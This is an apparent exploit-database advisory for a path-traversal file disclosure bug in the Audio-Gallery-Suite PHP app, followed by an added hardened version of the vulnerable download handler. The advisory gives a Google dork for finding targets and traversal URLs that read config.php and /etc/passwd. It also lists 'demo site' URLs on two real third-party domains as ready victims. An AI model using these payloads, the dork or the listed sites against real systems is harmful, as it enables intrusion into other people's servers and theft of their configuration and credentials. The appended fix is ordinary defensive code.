
Audio Gallery Suite Local File Disclosure

Posted on 08 July 2015

#######################################################
#
# [+] Exploit Title: Audio-Gallery-Suite Local File Disclosure Vulnerability
# [+] Google Dork: inurl:/downloadengine.php?file=
# [+] Date: July/04/2015
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Vendor Homepage: http://robinrizvi.info
# [+] Software Link: https://github.com/robinrizvi/Audio-Gallery-Suite
# [+] Version: All Version
# [+] Category: webapps
# [+] Platform: php
# [+] Tested on: Kali Linux
#
#######################################################
#
# [+] VULNERABILITY:
#
# LFD vulnerable File: downloadengine.php
#
# Code in downloadengine.php:
#
# <?php
# if (isset($_GET['file']))
# {
#     $fullfilename=$_GET['file'];
#     $filename=basename($fullfilename);
#
#     //load the file
#
#     readfile('../../../'.$fullfilename);
# }
# ?>
#
#######################################################
#
# [+] Exploit:
#
# http://localhost/media/player/php/downloadengine.php?file=[LFD]
#
#######################################################
#
# [+] Proof:
#
# http://localhost/media/player/php/downloadengine.php?file=media/player/php/downloadengine.php
#
# http://localhost/media/player/php/downloadengine.php?file=media/player/php/config.php
#
# http://localhost/media/player/php/downloadengine.php?file=../../../../../etc/passwd
#
#######################################################
#
# [+] Demo site:
#
# http://thisistohi.com/en/media/player/php/downloadengine.php?file=../../../../../etc/passwd
#
# http://www.rikhiapeeth.in/php/downloadengine.php?file=../index.php
#
#######################################################
#
# [+] Discovered By: Black.Hack3r
# [+] We Are: Black.Hack3r,M.R.S.CO,N3O,D$@d_M@n,HOt0N,KurD_HaCK3R
# [+] SpTnx: Mr.Cicili,Sec4ever,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
# [+] Home: http://wWw.IDC-TeaM.NeT
#
#######################################################
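
A hardened form of the downloadengine.php handler quoted in the advisory, as an added example (not code from the advisory or from the Audio-Gallery-Suite project). The DOWNLOAD_ROOT path, the resolve_download() helper and the extension allow-list are assumptions made for illustration; the point is that the request value is canonicalised and confined to one directory before readfile() is called.

```php
<?php
// Added example: hardened replacement for the readfile() call in downloadengine.php.
// ASSUMPTION: downloadable audio lives under one directory; this path is hypothetical.
const DOWNLOAD_ROOT = __DIR__ . '/../../../media/audio';

/**
 * Resolve a user-supplied name to a real file inside $root, or return null.
 * resolve_download() is a hypothetical helper, not part of the project.
 */
function resolve_download(string $root, string $requested): ?string
{
    // Reject empty values and embedded NUL bytes outright.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() collapses "../" and symlinks; it returns false for missing files.
    $target = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // The canonical path must still sit under the canonical root.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Allow-list by extension so config.php and other source files are never served.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    return in_array($ext, ['mp3', 'ogg', 'wav'], true) ? $target : null;
}

// $_GET['file'] can be an array (file[]=x); only accept a string.
$requested = $_GET['file'] ?? '';
$path = is_string($requested) ? resolve_download(DOWNLOAD_ROOT, $requested) : null;
if ($path === null) {
    http_response_code(404); // same response for "missing" and "outside root"
    exit;
}
$name = str_replace(['"', '\\'], '_', basename($path));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
```

With this check in place, the three "Proof" requests above (the handler's own source, config.php, and the ../ path to /etc/passwd) all return 404, since none resolves to an allow-listed file under DOWNLOAD_ROOT.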

 
